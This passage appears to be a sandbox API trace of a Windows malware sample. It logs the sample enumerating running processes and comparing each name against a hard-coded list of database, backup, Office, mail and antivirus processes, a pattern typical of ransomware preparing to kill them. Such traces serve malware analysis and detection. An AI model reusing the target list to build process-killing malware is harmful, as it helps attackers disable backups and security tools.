lstrcmpiA (lpString1="pidgin", lpString2="fbguard") returned 1 [0065.158] lstrcmpiA (lpString1="pidgin", lpString2="fbserver") returned 1 [0065.158] lstrcmpiA (lpString1="pidgin", lpString2="ONENOTEM") returned 1 [0065.158] lstrcmpiA (lpString1="pidgin", lpString2="YooIT") returned -1 [0065.158] lstrcmpiA (lpString1="pidgin", lpString2="wsa_service") returned -1 [0065.158] lstrcmpiA (lpString1="pidgin", lpString2="koaly-exp-engine-service") returned 1 [0065.158] lstrcmpiA (lpString1="pidgin", lpString2="TeamViewer_Service") returned -1 [0065.158] lstrcmpiA (lpString1="pidgin", lpString2="TeamViewer") returned -1 [0065.158] lstrcmpiA (lpString1="pidgin", lpString2="tv_w32") returned -1 [0065.158] lstrcmpiA (lpString1="pidgin", lpString2="tv_x64") returned -1 [0065.158] lstrcmpiA (lpString1="pidgin", lpString2="TitanV") returned -1 [0065.158] lstrcmpiA (lpString1="pidgin", lpString2="Ssms") returned -1 [0065.158] lstrcmpiA (lpString1="pidgin", lpString2="notepad") returned 1 [0065.158] lstrcmpiA (lpString1="pidgin", lpString2="RdrCEF") returned -1 [0065.158] lstrcmpiA (lpString1="pidgin", lpString2="sam") returned -1 [0065.158] lstrcmpiA (lpString1="pidgin", lpString2="sql") returned -1 [0065.158] lstrcmpiA (lpString1="pidgin", lpString2="oracle") returned 1 [0065.158] lstrcmpiA (lpString1="pidgin", lpString2="ocssd") returned 1 [0065.158] lstrcmpiA (lpString1="pidgin", lpString2="dbsnmp") returned 1 [0065.159] lstrcmpiA (lpString1="pidgin", lpString2="synctime") returned -1 [0065.159] lstrcmpiA (lpString1="pidgin", lpString2="agntsvc") returned 1 [0065.159] lstrcmpiA (lpString1="pidgin", lpString2="isqlplussvc") returned 1 [0065.159] lstrcmpiA (lpString1="pidgin", lpString2="xfssvccon") returned -1 [0065.159] lstrcmpiA (lpString1="pidgin", lpString2="mydesktopservice") returned 1 [0065.159] lstrcmpiA (lpString1="pidgin", lpString2="ocautoupds") returned 1 [0065.159] lstrcmpiA (lpString1="pidgin", lpString2="encsvc") returned 1 [0065.159] lstrcmpiA (lpString1="pidgin", lpString2="firefox") returned 1 [0065.159] lstrcmpiA (lpString1="pidgin", lpString2="tbirdconfig") returned -1 [0065.159] lstrcmpiA (lpString1="pidgin", lpString2="mydesktopqos") returned 1 [0065.159] lstrcmpiA (lpString1="pidgin", lpString2="ocomm") returned 1 [0065.159] lstrcmpiA (lpString1="pidgin", lpString2="dbeng50") returned 1 [0065.159] lstrcmpiA (lpString1="pidgin", lpString2="sqbcoreservice") returned -1 [0065.159] lstrcmpiA (lpString1="pidgin", lpString2="excel") returned 1 [0065.159] lstrcmpiA (lpString1="pidgin", lpString2="infopath") returned 1 [0065.159] lstrcmpiA (lpString1="pidgin", lpString2="msaccess") returned 1 [0065.159] lstrcmpiA (lpString1="pidgin", lpString2="mspub") returned 1 [0065.159] lstrcmpiA (lpString1="pidgin", lpString2="onenote") returned 1 [0065.159] lstrcmpiA (lpString1="pidgin", lpString2="outlook") returned 1 [0065.159] lstrcmpiA (lpString1="pidgin", lpString2="powerpnt") returned -1 [0065.159] lstrcmpiA (lpString1="pidgin", lpString2="steam") returned -1 [0065.159] lstrcmpiA (lpString1="pidgin", lpString2="thebat") returned -1 [0065.159] lstrcmpiA (lpString1="pidgin", lpString2="thunderbird") returned -1 [0065.159] lstrcmpiA (lpString1="pidgin", lpString2="visio") returned -1 [0065.159] lstrcmpiA (lpString1="pidgin", lpString2="winword") returned -1 [0065.159] lstrcmpiA (lpString1="pidgin", lpString2="wordpad") returned -1 [0065.159] lstrcmpiA (lpString1="pidgin", lpString2="bedbh") returned 1 [0065.159] lstrcmpiA (lpString1="pidgin", lpString2="vxmon") returned -1 [0065.159] lstrcmpiA (lpString1="pidgin", lpString2="benetns") returned 1 [0065.159] lstrcmpiA (lpString1="pidgin", lpString2="bengien") returned 1 [0065.159] lstrcmpiA (lpString1="pidgin", lpString2="pvlsvr") returned -1 [0065.160] lstrcmpiA (lpString1="pidgin", lpString2="beserver") returned 1 [0065.160] lstrcmpiA (lpString1="pidgin", lpString2="raw_agent_svc") returned -1 [0065.160] lstrcmpiA (lpString1="pidgin", lpString2="vsnapvss") returned -1 [0065.160] lstrcmpiA (lpString1="pidgin", lpString2="CagService") returned 1 [0065.160] lstrcmpiA (lpString1="pidgin", lpString2="DellSystemDetect") returned 1 [0065.160] lstrcmpiA (lpString1="pidgin", lpString2="EnterpriseClient") returned 1 [0065.160] lstrcmpiA (lpString1="pidgin", lpString2="VeeamNFSSvc") returned -1 [0065.160] lstrcmpiA (lpString1="pidgin", lpString2="VeeamTransportSvc") returned -1 [0065.160] lstrcmpiA (lpString1="pidgin", lpString2="VeeamDeploymentSvc") returned -1 [0065.160] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0065.161] PathRemoveExtensionA (in: pszPath="scriptftp.exe" | out: pszPath="scriptftp") [0065.161] lstrcmpiA (lpString1="scriptftp", lpString2="wxServer") returned -1 [0065.161] lstrcmpiA (lpString1="scriptftp", lpString2="wxServerView") returned -1 [0065.161] lstrcmpiA (lpString1="scriptftp", lpString2="Sqlservr") returned -1 [0065.161] lstrcmpiA (lpString1="scriptftp", lpString2="RAgui") returned 1 [0065.161] lstrcmpiA (lpString1="scriptftp", lpString2="supervise") returned -1 [0065.161] lstrcmpiA (lpString1="scriptftp", lpString2="Culture") returned 1 [0065.161] lstrcmpiA (lpString1="scriptftp", lpString2="RTVscan") returned 1 [0065.161] lstrcmpiA (lpString1="scriptftp", lpString2="Defwatch") returned 1 [0065.161] lstrcmpiA (lpString1="scriptftp", lpString2="sqlbrowser") returned -1 [0065.161] lstrcmpiA (lpString1="scriptftp", lpString2="winword") returned -1 [0065.161] lstrcmpiA (lpString1="scriptftp", lpString2="QBW32") returned 1 [0065.161] lstrcmpiA (lpString1="scriptftp", lpString2="QBDBMgr") returned 1 [0065.161] lstrcmpiA (lpString1="scriptftp", lpString2="qbupdate") returned 1 [0065.161] lstrcmpiA (lpString1="scriptftp", lpString2="QBCFMonitorService") returned 1 [0065.161] lstrcmpiA (lpString1="scriptftp", lpString2="axlbridge") returned 1 [0065.161] lstrcmpiA (lpString1="scriptftp", lpString2="QBIDPService") returned 1 [0065.161] lstrcmpiA (lpString1="scriptftp", lpString2="httpd") returned 1 [0065.161] lstrcmpiA (lpString1="scriptftp", lpString2="fdlauncher") returned 1 [0065.162] lstrcmpiA (lpString1="scriptftp", lpString2="MsDtSrvr") returned 1 [0065.162] lstrcmpiA (lpString1="scriptftp", lpString2="tomcat6") returned -1 [0065.162] lstrcmpiA (lpString1="scriptftp", lpString2="java") returned 1 [0065.162] lstrcmpiA (lpString1="scriptftp", lpString2="360se") returned 1 [0065.162] lstrcmpiA (lpString1="scriptftp", lpString2="360doctor") returned 1 [0065.162] lstrcmpiA (lpString1="scriptftp", lpString2="wdswfsafe") returned -1 [0065.162] lstrcmpiA (lpString1="scriptftp", lpString2="fdhost") returned 1 [0065.162] lstrcmpiA (lpString1="scriptftp", lpString2="GDscan") returned 1 [0065.162] lstrcmpiA (lpString1="scriptftp", lpString2="ZhuDongFangYu") returned -1 [0065.162] lstrcmpiA (lpString1="scriptftp", lpString2="QBDBMgrN") returned 1 [0065.162] lstrcmpiA (lpString1="scriptftp", lpString2="sqlwriter") returned -1 [0065.162] lstrcmpiA (lpString1="scriptftp", lpString2="mysqld") returned 1 [0065.162] lstrcmpiA (lpString1="scriptftp", lpString2="AutodeskDesktopApp") returned 1 [0065.162] lstrcmpiA (lpString1="scriptftp", lpString2="acwebbrowser") returned 1 [0065.162] lstrcmpiA (lpString1="scriptftp", lpString2="Creative Cloud") returned 1 [0065.162] lstrcmpiA (lpString1="scriptftp", lpString2="Adobe Desktop Service") returned 1 [0065.162] lstrcmpiA (lpString1="scriptftp", lpString2="CoreSync") returned 1 [0065.162] lstrcmpiA (lpString1="scriptftp", lpString2="Adobe CEF Helper") returned 1 [0065.162] lstrcmpiA (lpString1="scriptftp", lpString2="node") returned 1 [0065.162] lstrcmpiA (lpString1="scriptftp", lpString2="AdobeIPCBroker") returned 1 [0065.162] lstrcmpiA (lpString1="scriptftp", lpString2="sync-taskbar") returned -1 [0065.162] lstrcmpiA (lpString1="scriptftp", lpString2="sync-worker") returned -1 [0065.162] lstrcmpiA (lpString1="scriptftp", lpString2="InputPersonalization") returned 1 [0065.162] lstrcmpiA (lpString1="scriptftp", lpString2="AdobeCollabSync") returned 1 [0065.162] lstrcmpiA (lpString1="scriptftp", lpString2="BrCtrlCntr") returned 1 [0065.162] lstrcmpiA (lpString1="scriptftp", lpString2="BrCcUxSys") returned 1 [0065.162] lstrcmpiA (lpString1="scriptftp", lpString2="SimplyConnectionManager") returned -1 [0065.162] lstrcmpiA (lpString1="scriptftp", lpString2="Simply.SystemTrayIcon") returned -1 [0065.162] lstrcmpiA (lpString1="scriptftp", lpString2="fbguard") returned 1 [0065.163] lstrcmpiA (lpString1="scriptftp", lpString2="fbserver") returned 1 [0065.163] lstrcmpiA (lpString1="scriptftp", lpString2="ONENOTEM") returned 1 [0065.163] lstrcmpiA (lpString1="scriptftp", lpString2="YooIT") returned -1 [0065.163] lstrcmpiA (lpString1="scriptftp", lpString2="wsa_service") returned -1 [0065.163] lstrcmpiA (lpString1="scriptftp", lpString2="koaly-exp-engine-service") returned 1 [0065.163] lstrcmpiA (lpString1="scriptftp", lpString2="TeamViewer_Service") returned -1 [0065.163] lstrcmpiA (lpString1="scriptftp", lpString2="TeamViewer") returned -1 [0065.163] lstrcmpiA (lpString1="scriptftp", lpString2="tv_w32") returned -1 [0065.163] lstrcmpiA (lpString1="scriptftp", lpString2="tv_x64") returned -1 [0065.163] lstrcmpiA (lpString1="scriptftp", lpString2="TitanV") returned -1 [0065.163] lstrcmpiA (lpString1="scriptftp", lpString2="Ssms") returned -1 [0065.163] lstrcmpiA (lpString1="scriptftp", lpString2="notepad") returned 1 [0065.163] lstrcmpiA (lpString1="scriptftp", lpString2="RdrCEF") returned 1 [0065.163] lstrcmpiA (lpString1="scriptftp", lpString2="sam") returned 1 [0065.163] lstrcmpiA (lpString1="scriptftp", lpString2="sql") returned -1 [0065.163] lstrcmpiA (lpString1="scriptftp", lpString2="oracle") returned 1 [0065.163] lstrcmpiA (lpString1="scriptftp", lpString2="ocssd") returned 1 [0065.163] lstrcmpiA (lpString1="scriptftp", lpString2="dbsnmp") returned 1 [0065.163] lstrcmpiA (lpString1="scriptftp", lpString2="synctime") returned -1 [0065.163] lstrcmpiA (lpString1="scriptftp", lpString2="agntsvc") returned 1 [0065.163] lstrcmpiA (lpString1="scriptftp", lpString2="isqlplussvc") returned 1 [0065.163] lstrcmpiA (lpString1="scriptftp", lpString2="xfssvccon") returned -1 [0065.163] lstrcmpiA (lpString1="scriptftp", lpString2="mydesktopservice") returned 1 [0065.163] lstrcmpiA (lpString1="scriptftp", lpString2="ocautoupds") returned 1 [0065.163] lstrcmpiA (lpString1="scriptftp", lpString2="encsvc") returned 1 [0065.163] lstrcmpiA (lpString1="scriptftp", lpString2="firefox") returned 1 [0065.163] lstrcmpiA (lpString1="scriptftp", lpString2="tbirdconfig") returned -1 [0065.164] lstrcmpiA (lpString1="scriptftp", lpString2="mydesktopqos") returned 1 [0065.164] lstrcmpiA (lpString1="scriptftp", lpString2="ocomm") returned 1 [0065.164] lstrcmpiA (lpString1="scriptftp", lpString2="dbeng50") returned 1 [0065.164] lstrcmpiA (lpString1="scriptftp", lpString2="sqbcoreservice") returned -1 [0065.164] lstrcmpiA (lpString1="scriptftp", lpString2="excel") returned 1 [0065.164] lstrcmpiA (lpString1="scriptftp", lpString2="infopath") returned 1 [0065.164] lstrcmpiA (lpString1="scriptftp", lpString2="msaccess") returned 1 [0065.164] lstrcmpiA (lpString1="scriptftp", lpString2="mspub") returned 1 [0065.164] lstrcmpiA (lpString1="scriptftp", lpString2="onenote") returned 1 [0065.164] lstrcmpiA (lpString1="scriptftp", lpString2="outlook") returned 1 [0065.164] lstrcmpiA (lpString1="scriptftp", lpString2="powerpnt") returned 1 [0065.164] lstrcmpiA (lpString1="scriptftp", lpString2="steam") returned -1 [0065.164] lstrcmpiA (lpString1="scriptftp", lpString2="thebat") returned -1 [0065.164] lstrcmpiA (lpString1="scriptftp", lpString2="thunderbird") returned -1 [0065.164] lstrcmpiA (lpString1="scriptftp", lpString2="visio") returned -1 [0065.164] lstrcmpiA (lpString1="scriptftp", lpString2="winword") returned -1 [0065.164] lstrcmpiA (lpString1="scriptftp", lpString2="wordpad") returned -1 [0065.164] lstrcmpiA (lpString1="scriptftp", lpString2="bedbh") returned 1 [0065.164] lstrcmpiA (lpString1="scriptftp", lpString2="vxmon") returned -1 [0065.164] lstrcmpiA (lpString1="scriptftp", lpString2="benetns") returned 1 [0065.164] lstrcmpiA (lpString1="scriptftp", lpString2="bengien") returned 1 [0065.164] lstrcmpiA (lpString1="scriptftp", lpString2="pvlsvr") returned 1 [0065.164] lstrcmpiA (lpString1="scriptftp", lpString2="beserver") returned 1 [0065.164] lstrcmpiA (lpString1="scriptftp", lpString2="raw_agent_svc") returned 1 [0065.164] lstrcmpiA (lpString1="scriptftp", lpString2="vsnapvss") returned -1 [0065.164] lstrcmpiA (lpString1="scriptftp", lpString2="CagService") returned 1 [0065.164] lstrcmpiA (lpString1="scriptftp", lpString2="DellSystemDetect") returned 1 [0065.164] lstrcmpiA (lpString1="scriptftp", lpString2="EnterpriseClient") returned 1 [0065.164] lstrcmpiA (lpString1="scriptftp", lpString2="VeeamNFSSvc") returned -1 [0065.164] lstrcmpiA (lpString1="scriptftp", lpString2="VeeamTransportSvc") returned -1 [0065.164] lstrcmpiA (lpString1="scriptftp", lpString2="VeeamDeploymentSvc") returned -1 [0065.164] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x85c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0065.165] PathRemoveExtensionA (in: pszPath="skype.exe" | out: pszPath="skype") [0065.165] lstrcmpiA (lpString1="skype", lpString2="wxServer") returned -1 [0065.165] lstrcmpiA (lpString1="skype", lpString2="wxServerView") returned -1 [0065.165] lstrcmpiA (lpString1="skype", lpString2="Sqlservr") returned -1 [0065.165] lstrcmpiA (lpString1="skype", lpString2="RAgui") returned 1 [0065.166] lstrcmpiA (lpString1="skype", lpString2="supervise") returned -1 [0065.166] lstrcmpiA (lpString1="skype", lpString2="Culture") returned 1 [0065.166] lstrcmpiA (lpString1="skype", lpString2="RTVscan") returned 1 [0065.166] lstrcmpiA (lpString1="skype", lpString2="Defwatch") returned 1 [0065.166] lstrcmpiA (lpString1="skype", lpString2="sqlbrowser") returned -1 [0065.166] lstrcmpiA (lpString1="skype", lpString2="winword") returned -1 [0065.166] lstrcmpiA (lpString1="skype", lpString2="QBW32") returned 1 [0065.166] lstrcmpiA (lpString1="skype", lpString2="QBDBMgr") returned 1 [0065.166] lstrcmpiA (lpString1="skype", lpString2="qbupdate") returned 1 [0065.166] lstrcmpiA (lpString1="skype", lpString2="QBCFMonitorService") returned 1 [0065.166] lstrcmpiA (lpString1="skype", lpString2="axlbridge") returned 1 [0065.166] lstrcmpiA (lpString1="skype", lpString2="QBIDPService") returned 1 [0065.166] lstrcmpiA (lpString1="skype", lpString2="httpd") returned 1 [0065.166] lstrcmpiA (lpString1="skype", lpString2="fdlauncher") returned 1 [0065.166] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x86c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0065.167] PathRemoveExtensionA (in: pszPath="smartftp.exe" | out: pszPath="smartftp") [0065.167] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x87c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0065.168] PathRemoveExtensionA (in: pszPath="thunderbird.exe" | out: pszPath="thunderbird") [0065.168] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x198 [0065.171] Process32First (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0065.172] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0065.172] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0065.173] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0065.174] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0065.174] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0065.175] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0065.175] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0065.176] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0065.177] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0065.177] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0065.178] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0065.179] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0065.179] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0065.180] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x38, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0065.181] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0065.181] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0065.182] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x11c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0065.183] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x444, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0065.183] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0065.184] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0065.184] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0065.185] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0065.186] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0065.186] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="allow_south.exe")) returned 1 [0065.187] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="killed-dependent.exe")) returned 1 [0065.187] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x730, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="mercury.exe")) returned 1 [0065.188] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="smithsonian_census_litigation.exe")) returned 1 [0065.188] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x60c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="hrs.exe")) returned 1 [0065.189] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x20c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="combined nearest.exe")) returned 1 [0065.190] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="equations.exe")) returned 1 [0065.190] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="pubmed-ranging-expired.exe")) returned 1 [0065.191] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ng microphone options.exe")) returned 1 [0065.191] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="perspectivesimagineclassics.exe")) returned 1 [0065.192] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x408, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="exposure.exe")) returned 1 [0065.192] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="tablet.exe")) returned 1 [0065.193] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="essex_serious.exe")) returned 1 [0065.194] 